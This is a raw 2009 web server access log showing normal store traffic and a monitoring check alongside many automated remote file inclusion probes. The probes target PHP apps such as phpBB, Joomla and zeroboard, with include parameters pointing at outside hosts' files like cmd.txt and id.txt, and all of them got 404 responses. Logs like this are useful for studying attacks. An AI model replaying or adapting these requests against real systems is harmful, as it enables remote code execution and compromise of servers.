121.169.189.169 - - [12/Aug/2009:05:19:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4091B5C600BD23091+M37+ENG HTTP/1.1" 200 76831 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:32 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4091B5C600BD23091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:32 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4091B5C600BD23091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:32 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4091B5C600BD23091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
61.100.186.87 - - [12/Aug/2009:05:19:35 -0400] "GET //config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:05:19:35 -0400] "GET /logs//config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:05:19:35 -0400] "GET /logs/access_log.Q109070300%20%20//config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:05:19:36 -0400] "GET /logs/access_log.Q109061100%20%20//config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Aug/2009:05:19:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B469DD5C600BFF3091+M37+ENG HTTP/1.1" 200 45637 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:37 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B469DD5C600BFF3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:37 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B469DD5C600BFF3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B469DD5C600BFF3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
209.59.12.99 - - [12/Aug/2009:05:19:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [12/Aug/2009:05:19:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4D97958600B2F3091+M37+ENG HTTP/1.1" 200 42891 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B469DD5C600BFF3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
195.155.232.36 - - [12/Aug/2009:05:19:45 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
139.142.180.81 - - [12/Aug/2009:05:20:01 -0400] "GET /logs/error_log.Q109061400/errors.php?error=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
110.45.146.193 - - [12/Aug/2009:05:20:02 -0400] "GET /logs/access_log.Q109062500//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
110.45.146.193 - - [12/Aug/2009:05:20:02 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
110.45.146.193 - - [12/Aug/2009:05:20:03 -0400] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
139.142.180.81 - - [12/Aug/2009:05:20:03 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
61.100.186.87 - - [12/Aug/2009:05:20:15 -0400] "GET /logs/access_log.Q109070300//config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:05:20:15 -0400] "GET /logs/access_log.Q109060300//config.php?path_to_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:20:19 -0400] "GET /logs/access_log.Q109072700%20%20//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:20:19 -0400] "GET /logs/error_log.Q109072700%20%20//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:20:19 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:20:20 -0400] "GET /logs/access_log.Q109080100//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:20:21 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:20:26 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:20:43 -0400] "GET /logs//appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:20:43 -0400] "GET //appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:20:43 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:20:44 -0400] "GET /logs/access_log.Q109071900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:20:48 -0400] "GET /logs/access_log.Q109060300//appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:20:54 -0400] "GET //_test_holidays.php?APB_rp=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:20:57 -0400] "GET /logs//_test_holidays.php?APB_rp=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:20:57 -0400] "GET /logs/access_log.Q108121100//_test_holidays.php?APB_rp=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Aug/2009:05:21:06 -0400] "GET /logs/access_log.Q109060900////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.174.114.20 - - [12/Aug/2009:05:21:12 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:21:17 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.828"
110.45.146.193 - - [12/Aug/2009:05:21:18 -0400] "GET /logs/error_log.Q109061400//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
91.121.89.135 - - [12/Aug/2009:05:21:22 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:21:22 -0400] "GET /logs/access_log.Q109060300%20%20//appserv/main.php?appserv_root=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:21:35 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /logs/access_log.Q109063000%20%20/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:21:44 -0400] "GET /logs/access_log.Q109063000%20%20/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Aug/2009:05:21:56 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4D97958600B2F3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
139.142.180.81 - - [12/Aug/2009:05:22:04 -0400] "GET /logs/error_log.Q109061400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.27.6.186 - - [12/Aug/2009:05:22:16 -0400] "GET /logs/access_log.Q109070900%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:22:16 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:22:16 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:22:29 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:22:29 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:22:29 -0400] "GET /logs/access_log.Q109070900%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:22:41 -0400] "GET /logs///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:22:41 -0400] "GET /logs/access_log.Q109062400%20%20///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:22:41 -0400] "GET /logs/access_log.Q109051300%20%20///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:23:02 -0400] "GET //appserv/main.php?appserv_root=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
110.45.146.193 - - [12/Aug/2009:05:23:02 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
119.245.138.143 - - [12/Aug/2009:05:23:02 -0400] "GET /logs/access_log.Q109051200////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Aug/2009:05:23:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B459D65B600CA43091+M37+ENG HTTP/1.1" 200 45637 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B4D97958600B2F3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
198.64.149.33 - - [12/Aug/2009:05:23:13 -0400] "GET /index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:13 -0400] "GET /logs/index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:13 -0400] "GET /logs/access_log.Q109080100%20%20/index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:13 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:19 -0400] "GET ////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:19 -0400] "GET /logs/access_log.Q109080100////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:19 -0400] "GET /logs////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:19 -0400] "GET /logs/access_log.Q109062300////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:23:25 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:23:25 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:23:25 -0400] "GET /logs/access_log.Q109052900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:23:43 -0400] "GET /logs/access_log.Q109080100%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:47 -0400] "GET /logs/access_log.Q109080100%20%20////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
198.64.149.33 - - [12/Aug/2009:05:23:47 -0400] "GET /logs/access_log.Q109062300%20%20////index.php?conteudo=http://www.rustrubprom.ru/images/uploads/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:23:48 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:24:07 -0400] "GET /logs/access_log.Q109071900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.114.174.160 - - [12/Aug/2009:05:24:27 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
210.114.174.160 - - [12/Aug/2009:05:24:33 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
209.59.12.99 - - [12/Aug/2009:05:24:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.155.232.36 - - [12/Aug/2009:05:25:00 -0400] "GET /logs/access_log.Q109080100%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:25:04 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Aug/2009:05:25:06 -0400] "GET /logs/access_log.Q109051500////?_SERVER%5BDOCUMENT_ROOT%5D=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:25:06 -0400] "GET /logs/access_log.Q109062400///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:25:06 -0400] "GET /logs/access_log.Q109051300///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.27.138 - - [12/Aug/2009:05:25:34 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.27.138 - - [12/Aug/2009:05:25:34 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.98.27.138 - - [12/Aug/2009:05:25:34 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.98.27.138 - - [12/Aug/2009:05:25:35 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:05:26:08 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:09 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:09 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:09 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:09 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:12 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:12 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:12 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.3.139.249 - - [12/Aug/2009:05:26:13 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:26:19 -0400] "GET /logs/access_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:26:29 -0400] "GET /logs/access_log.Q109062400%20%20///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:26:29 -0400] "GET /logs///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:26:29 -0400] "GET /logs/access_log.Q109051300%20%20///main.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:39 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:39 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:39 -0400] "GET /logs/access_log.Q109072400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:26:42 -0400] "GET /logs/error_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:42 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:42 -0400] "GET /logs/access_log.Q109072400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:05:26:42 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:05:26:43 -0400] "GET /logs/access_log.Q109063000/skin/zero_vote/ask_password.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
